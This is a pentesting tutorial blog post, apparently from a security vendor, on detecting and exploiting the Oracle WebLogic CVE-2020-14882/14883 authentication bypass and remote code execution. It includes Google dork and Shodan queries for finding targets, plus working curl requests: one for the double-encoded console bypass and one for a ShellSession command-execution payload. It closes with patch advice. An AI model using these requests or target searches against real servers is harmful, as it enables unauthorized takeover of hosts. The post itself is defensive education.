Security Research

How to detect and exploit the Oracle WebLogic RCE (CVE-2020-14882 & CVE-2020-14883)

Updated at
Reading time
read

Pentesters love a good RCE, but, as much as we enjoy the thrill of detecting and exploiting it (ethically, of course), the tech ecosystem suffers every time one of these pops up. 

That’s why fast and effective recon and vulnerability assessment remain the go-to pentesting stages that help companies manage their risks so they can keep doing business and serving their customers. With your knowledge, experience, and advice, they can turn a potential hazard into a process that makes them stronger.

Let’s take a closer look at the critical RCE vulnerability discovered in Oracle WebLogic Server and see how you can have a bigger positive impact in your organization and beyond it. 

What is Oracle WebLogic?

WebLogic Server is a Java-based application server; a platform for developing and deploying multi-tier distributed enterprise applications. WebLogic Server centralizes application services such as web server functionality, business components, and access to backend enterprise systems and can also be used as the primary Web server for advanced Web-enabled applications.

Over 7,000 companies around the world use WebLogic, which makes it an important part of the tech ecosystem.

How the Oracle WebLogic RCE vulnerability works (CVE-2020-14883)

CVE-2020-14882 allows remote users to circumvent the authentication in the administrator console component. What causes this vulnerability is the improper configuration of the Path Traversal blacklist of the server URL which you can find inside a handler class of the WebLogic HTTP access. 

You can bypass the blacklist of the server URL by using a double encoded string such as %252e%252e%252fconsole.portal.

CVE-2020-14883 allows unauthenticated users to execute any command on the administrator console component. The resulting risk is that an unauthenticated remote attacker can execute arbitrary commands on the Oracle WebLogic server over HTTP and take complete control of the host.

Vulnerable Oracle WebLogic versions

Supported versions that are affected include 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. This vulnerability has a CVSSv3 score of 9.8 because exploiting it doesn’t require a very complex attack.

Patches have been available since October 2020, but it is very likely there is still a significant number of vulnerable instances out there.

How to find targets vulnerable to CVE-2020-14882 and CVE-2020-14883 

You can use Google Dorks to sniff out WebLogic hosts using potentially vulnerable versions with the following search query: inurl:”/console/login/LoginForm.jsp”

Google Dorks result

 

Alternatively, you can use Shodan.io to find some vulnerable targets across the internet. You can use the following Shodan query to find potentially vulnerable WebLogic servers:

product: “Oracle WebLogic”

Shodan search query results

Business impact of CVE-2020-14882 and CVE-2020-14883

With RCE access, an attacker can easily get into the WebLogic server. Due to the high privileges acquired, a malicious hacker can carry out any administrative action and take complete control over the application. 

How to manually detect CVE-2020-14882 & CVE-2020-14883 in ethical hacking engagements

First, you can bypass authentication of the console component with a simple HTTP GET request to a double encoded endpoint, which contains the Console Portal page and executes the CVE-2020-14882 vulnerability.

curl -k -X "GET" https://<HOST>/console/css/%252e%252e%252fconsole.portal

This HTTP GET request will redirect you to the Administrator Console page and this will bypass the authentication, confirming that your target server is vulnerable. 

You will be then connected to the target domain and be able to configure, monitor, and control the applications.

By exploiting CVE-2020-14883, you can send commands via an MVEL expression under the handle of com.tangosol.coherence.mvel2.sh.ShellSession class. This can cause remote code execution, allowing a malicious unauthenticated attacker to execute arbitrary code on the server.

curl -k -X "GET" https://<HOST>/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/pentest00ls');")

This HTTP GET request will create a file in the target system, located in the /tmp directory and will trigger remote code execution.

If you’re curious to try another, much faster detection tactic, you can use Pentest-Tools.com

How to mitigate CVE-2020-14882 & CVE-2020-14883

You can read the Oracle Critical Patch Update Advisory and follow the steps they recommend. Also, you should update your WebLogic server to the latest version whenever possible.

This is not the last RCE vulnerability you’ll hear about. Who knows how many more critical vulnerabilities will emerge this year or the next one (or the next one)? 

What makes a difference is having a process for prioritizing the most valuable assets and knowing how to validate when they’re affected by a highly exploitable vulnerability. 

Through our practical pentesting guides, we offer you expertise, helpful methods, and valuable insights that expand your know-how and abilities. Let us know if there’s ever anything specific you want us to cover – pentester to pentester. 

Get future pentesting guides!

We won't spam you with useless information.

Ready to apply what you read?

Use our free tools

Related articles